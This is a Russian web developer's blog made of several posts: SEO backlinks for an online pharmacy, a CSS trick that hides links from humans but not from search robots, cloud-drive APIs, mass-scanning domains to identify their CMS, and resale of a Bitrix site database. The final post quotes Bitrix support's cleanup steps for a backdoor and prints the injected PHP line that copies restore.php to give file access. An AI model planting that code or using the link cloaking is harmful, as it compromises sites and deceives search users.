Анализировал сегодня два проекта — один из последних sexipower.ru, в который вложил на раскачку не мало денег в виде размещения статей на внешних ресурсах, кстати остался очень недоволен. Через ссылочные биржи типа ГГЛ двигать нельзя было т.к. тематика запрещённая — пришлось работать с частным сервисом, их менеджер anastasiya_seo@mail.ru «раскрутила» меня на три пакета с «нереальными» скидками — показатели ТИЦ оказались враньём, сами сервисы подозрительного качества и самое хреновое — обманули с начальными условиями — договаривались, что доноры в пакетах повторяться не будут, по факту вышло всё совсем не так… Ладно — это другая «песня», сейчас не об этом…
Другой проект — не вложил ни копейки, раскручивал только бесплатно (только свои ресурсы + бесплатные сторонние ресурсы).
В итоге проект без вложений работает (тьфу тьфу тьфу), а проект с финансовыми вложениями на нуле!

В общем, анализировал я входящие ссылки в Я.Вебмастере и хоть и говорят, что такие в СЕО не работают, но что-то я начал сомневаться в этом.
Короче, подготовил я для паучков небольшую пачечку ссылей
1. Профиль аккаунта Google Plus — такую ссылку Я.Вебмастер показывает с ИКС гугла 120 000 — если так и есть, то мега круто!
2. prlog.ru — ИКС сайта 150 — http://prlog.ru/analysis/sexipower.ru
3. megaindex.ru — ИКС сайта 850 — Рейтинг с фильтром по сайту https://www.megaindex.ru/index.php?tab=siteRating&filter=sexipower.ru
4. whois сервис — ИКС сайта 50 — ссылка на странице http://stuffgate.com/sexipower.ru
5. domenolog.ru — ИКС сайта 1400 — ссылка на ресурс http://domenolog.ru/sexipower.ru
6. pr.cy — ИКС сайта 4400 — бэклинк тут https://a.pr-cy.ru/sexipower.ru/
7. advisor.wmtransfer.com — nofollow — ИКС 3700 — http://advisor.wmtransfer.com/SiteDetails.aspx?url=sexipower.ru&tab=feedback и https://advisor.wmtransfer.com/sitedetails.aspx?url=sexipower.ru
7. elane.ru статистика сайта — ИКС 110 — страница с nofollow ссылкой https://elane.ru/site-info.html/sexipower.ru
8. инфа о сайте www.webviki.ru — ИКС 350 — страничка http://www.webviki.ru/sexipower.ru

(так же не забываем форумы, где можно поставить ссылочку)

Знаете ещё ?! — пишите, добавлю!

Добавлено:
1. ИКС 10 https://ww2.gorank.win/sexipower.ru
2. ИКС 10 http://stuffgate.com/sexipower.ru

PS
Ещё думаю, что очень зря я при выборе домена для онлайн аптеки выбрал домен содержащий «sex» т.е. sexipower.ru
(может и пофиг — у меня уже паранойя видимо, т.к. вообще мёртво в выдаче лежит, не знаю на что и думать уже)

Собственно, продолжение предыдущей моей статейки ОЧЕНЬ НЕ ПРОСТАЯ РАБОТА С GOOGLE DRIVE API.

Как обычно — сначала загуглил материал в сетке, нашел на snipp.ru замечательную статейку Использование API Яндекс Диска на PHP.

К работе на стороне Яши я уже был подготовлен т.к. реализация так же была через QAuth токен, НО в Яндексе всё было для меня гораздо проще, интуитивно понятней и практичней!!!

И самое приятное — в статье рассматриваются примеры работы с REST API напрямую с помощью CURL-а! без всяких навороченных библиотек (хотя они конечно же есть, например готовый PHP SDK – https://github.com/jack-theripper/yandex).

Первое, что я сделал — запросил список файлов корня и … УРА! получил ни больше, ни меньше — именно то, что лежало на Я.Диске! (в отличие от Гугла)
Собственно, и дальше всё пошло без каких то «фокусов» — все запросы отрабатывали именно так как нужно.
Соединив это дело с Битриксом я всё таки реализовал ТЗ!
Так что, если будет что подобное — сразу реализуйте на Яндекс.Диске 🙂

Озадачили меня недавно довольно интересной задачей — синхронизация файлов (в моём случае изображений) с Гугл Диска на сайт под управлением 1С-Битрикс.
Хотелка такая — кидаем в определённую папку на диске изображение — скрипт его обнаруживает и создаёт элемент на сайте с детальным изображением из этой картинки.
Папки с изображениями на сайте — на Гугл Диске тоже самое…

Задача вроде ясна, дело казалось бы за малым — найти PHP API для Google Drive и сляпать скриптик делающий слепок того, что есть и сравнивающий при запуске то, что имеем в текущий момент.
Если есть новое файло — качаем, создаём элемент и вуаля…

Сразу нашел хорошую статейку-мануал Простая работа с Google Drive API в которой получают список файлов на диске (основной момент для моей реализации) и с хорошим настроением начал продвигаться вглубь…

Скачал с Гитхаба уже готовую библиотеку Google API Client Library for PHP, собственно установил её с помощью composer, параллельно включив необходимые php модули … в общем всё по-настоящему!

Далее под своей учёткой в гугл консоли создал QAuth токен (тоже не тривиальная процедура я Вам скажу — ещё и Гугл довольно долго тупил — после подтверждения сайта, никак в окне QAuth в Авторизованные домены не хотел добавляться — наверное час тупил 🙁

В общем всё шло довольно ровно … до тех пор пока я не начал работать непосредственно с файловой структурой Гугл Диска!!!
Это жесть! В статейке, указанной мной в начале поста я довольно много комментировал т.к. довольно много не понимал.
И скажу я Вам — так и не понял 🙁
Даже на тестовом драйве где у меня было всего ничего файлов — Гугл упорно мне отдавал то, чего у меня и в помине не было … но были в «доступные мне» файлы.
При работе с драйвом заказчика вообще тушите свет — вместо менее тысячи файлов, мне было отдано наверное тысяч 20… и то с очень большим «скрипом» т.к. при получении данных очень часто библиотека вылетала в ошибку… Как «взять» только моё я так и не понял. Причём один и тот же файл легко встречался по несколько раз с разными «предками»… мраки …

После ряда экспериментов я решил попробовать Яндекс диск для реалзиации той же задачи … и больше я к Гуглу не возвращался! В общем одно слово — неруси!

Иногда есть необходимость поставить ссылку на сторонний сайт только для роботов, соответственно от людей такую ссылку необходимо спрятать.
Для такого действа я добавляю в ссылку следующие CSS свойства
1. color: XXX; — цвет ссылки задаю такой же как у окружающего текста
2. text-decoration:none; — убираем подчёркивание
3. cursor:text; — убираем изменение вида курсора при наведении
по идее ещё можно добавить обработку onclick false — но думаю поисковым роботам такое может не понравится

В итоге получили скрытую ссылку на сайт!
Кстати — в данном тексте такая присутствует — найдёте? 🙂

Инфографику предоставила Wrike — Система Планирования Управления Проектами
Читать полностью »

Вчера клиент закосячил сайт на Joomla — попросил восстановить из бэкапа, что я и сделал — НО сайт не заработал!
Откатил ещё на более ранний бэкап — не пашет!
Включил отображение ошибок — Fatal error: Class ‘JCache’ not found in /libraries/joomla/factory.php on line XXX

Решение найдено, Вы когда бекапите или переносите, не забираете содержимое папки /libraries/joomla/cache
потому что в бекапщиках обычно стоит исключение папок cache, поэтому нужно дополнительно ее себе скопировать.

Вот такой вот курьёз 🙂

Собственно, задача — автоматизация процесса загрузки файла на сайты через веб-форму.
То есть на разные сайты мне нужно загрузить один и тот же файлик — захожу на сайт, выбираю нужный файл жму аплоад!
Список адресов сайтов с формой есть, файл конечно тоже — нужно автоматизировать!

Для реализации поставленной задачи решил использовать библиотеку curl, но вот с передачей файла возникла проблема — никак у меня не получалось отправить файл в форму!
Довольно долго рыл и нарыл таки рабочее решение
https://stackoverflow.com/questions/4223977/send-file-via-curl-from-form-post-in-php и оно же на другом ресурсе
https://exceptionshub.com/send-file-via-curl-from-form-post-in-php.html

Собственно, чел видимо затрахался как и я и решил передаваемые в POST данные сгенерировать самостоятельно с правильными заголовками.
Незнаю почему, но у меня в кодировке base64 ну никак не передавался, вернее передавался, но в такой кодировке и сохранялся 🙂 т.е. в закодированном виде, поэтому я несколько переделал скрипт до рабочего состояния (и увеличил кол-во передаваемых переменных для наглядности).

Получился такой код
Читать полностью »

Продам базу сайтов на CMS Битрикс — почти 192 тысячи доменов.
Цена 700 рублей
Актуальность базы — октябрь 2018г.
Точнее перепродам с целью отбить вложения и если нужна база посвежее или нужны базы на других CMS — источник в предыдущем посте.
База качественная, проверил все домены которые знал с 1С Битрикс — они в базе присутствуют.

Цитата автора:

Я не собираю сайты из поисковых систем, а ежемесячно сканирую списки доменов, полученные от регистраторов напрямую из 1755 доменных зон включая популярные зоны ccTLD. И Вам не нужно ждать по полгода следующего обновления.
Не верьте тем, кто пишет, что они прочекали 310 млн или более.
За 8 лет работы с базами доменов я могу смело заверить, что такого количества ЖИВЫХ доменов просто не существует, если они, конечно, не чекают проэкспайреные))
Купив базу сайтов на 1C-Bitrix, Вы можете быть уверены, что получаете актуальный и максимально полный список всех существующих доменов на данной CMS!

Количество доменов по доменным зонам (с количеством более 50)

All 1C-Bitrix.txt: 191854
===============================================
ru 124288 02-10-2018
xn--p1ai 31828 02-10-2018
com 12017 02-10-2018
su 4386 02-10-2018
ua 3100 02-10-2018
by 2727 02-10-2018
pro 1642 02-10-2018
kz 1641 02-10-2018
net 1226 02-10-2018
org 1064 02-10-2018
info 906 02-10-2018
biz 412 02-10-2018
online 304 02-10-2018
moscow 294 02-10-2018
xn--p1acf 263 02-10-2018
club 214 02-10-2018
shop 211 02-10-2018
xn--80adxhks 196 02-10-2018
de 191 02-10-2018
me 190 02-10-2018
eu 176 02-10-2018
site 162 02-10-2018
space 146 02-10-2018
uz 138 02-10-2018
tv 116 02-10-2018
store 107 02-10-2018
market 105 02-10-2018
cz 104 02-10-2018
center 95 02-10-2018
tj 93 02-10-2018
group 82 02-10-2018
xn--80asehdb 79 02-10-2018
uk 75 02-10-2018
nl 73 02-10-2018
vn 72 02-10-2018
lv 69 02-10-2018
top 62 02-10-2018
lt 61 02-10-2018
website 56 02-10-2018
one 55 02-10-2018
es 54 02-10-2018
expert 53 02-10-2018
life 51 02-10-2018
travel 50 02-10-2018
agency 50 02-10-2018

Решил записать мысль — ничего особенного, просто констатация факта 🙂
Собственно, для быстрого чека сайтов на определённой системе управления надо чекать какую нибудь статику, свойственную только для этой CMS — отдача будет практически мгновенная т.к. обрабатывать будет препроцессор nginx.
Например, для Битрикса можно проверять /bitrix/js/main/core/css/core.css
Например, так можно прочекать целиком доменные зоны (.ru .su .рф и т.д.)
Правда для таких объёмов придётся какой нить многопоточный чекер заюзать… но это уже тема для другого поста

PS
Млин, ниша уже занята 🙁
Чел чекает базы с доменных зон, распределяет по признакам и продаёт
http://shop.fe-play.ru/svn53-142350/
747 продаж ! (в основном джумла и вордпресс — ценник за 2 т.р.) — короче на полтора ляма уже наторговал! Молодец!
Жаль мне эта мысль в голову не пришла 🙁
Готовая база Битрикс сайтов всего 1350 руб. http://shop.fe-play.ru/2128005-baza-saytov-na-cms-1c-bitrix/

PPS
Если записаться в конкуренты, прикинем требования: 300 млн. доменов нужно чекать за месяц, это по 10 млн в сутки! Делим на 24*60*60 = нужно чекать 116 сайтов в секунду! однако!!!
Тут одним сервером не обойтись! Ну и как писал выше — многопоточка + статические признаки
Тут ещё момент — для статических признаков разные запросы, так что количество доменов нужно умножать на количество признаков! (начинаю сомневаться в ежемесячной актуальности баз)
Хотя, для повторной проверки, когда CMS ранее уже была определена — потребуется только один запрос, так что если с умом — реально! (правда ещё момент не учёл — время на работу с БД! база то не хилая получается!)

Всем привет!

Уже на третьем сайте под управлением CMS Битрикс (разные лицензии) обнаруживаю одни и те-же бэкдоры и трояны, причём непосредственно в файлах движка Битрикса!
Инструмент монитор качества «Ядро проекта не модифицировалось» такие файлы не ловит т.к. это не модифицированные, а просто левые файлы.
Но вот почему модификацию /bitrix/modules/main/include.php не находит — уже вопрос
Вообще файлик этот довольно мутный — в нём присутствует обфуцированный код, причём легальный — от конторы 1С Битрикс. (что и раздражает — вирусу легко можно спрятаться под этот код)

На крайнем проекте уже не выдержал и написал в саппорт вопрос о технологии поиска лишних файлов, на что получил не совсем то, что хотел, но думаю для поиска таких типичных вирусов это неплохая инструкция (вообще думаю в движке была дырка, которая не афишируется, через которую и произошла иньекция — т.к. сайты абсолютно разные, а вирусятина одна и та же!)

ЦИТАТА
Добрый день!

Да, это вирус.

Вам необходимо:
1. Сделать полную резервную копию сайта.
2. Удалить restore.php из корня сайта.
3. Удалить посторонний скрипт /bitrix/js/main/core/core_loader.js
4. Отредактировать /bitrix/modules/main/include.php, удалив из него строчки:

require_once($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/gadgets/bitrix/weather/lang/ru/exec/include.php");

if($_REQUEST["key"]!=""){if($_REQUEST["key"]=="a".md5("B_PROLOG_INCLUDED")."e"){$resu1t=copy($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/admin/restore.php",$_SERVER["DOCUMENT_ROOT"]."/restore.php");if($resu1t){die("ok");}else{die("fail");}}};


5. Удалить /bitrix/gadgets/bitrix/weather/lang/ru/exec/include.php и /bitrix/tools/check_files.php

если открывается http:// сайт /?utm_term=version — ваш сайт взломан с полным управлением у злоумышленника!
если открывается http:// сайт /bitrix/js/main/core/core_loader.js — ваш сайт взломан с полным управлением у злоумышленника!
если в корне лежит restore.php (а его там раньше не было) — тоже самое!

Заражение в действии — злоумышленник получает полный файловый доступ к сайту!

Вот такая приколюха!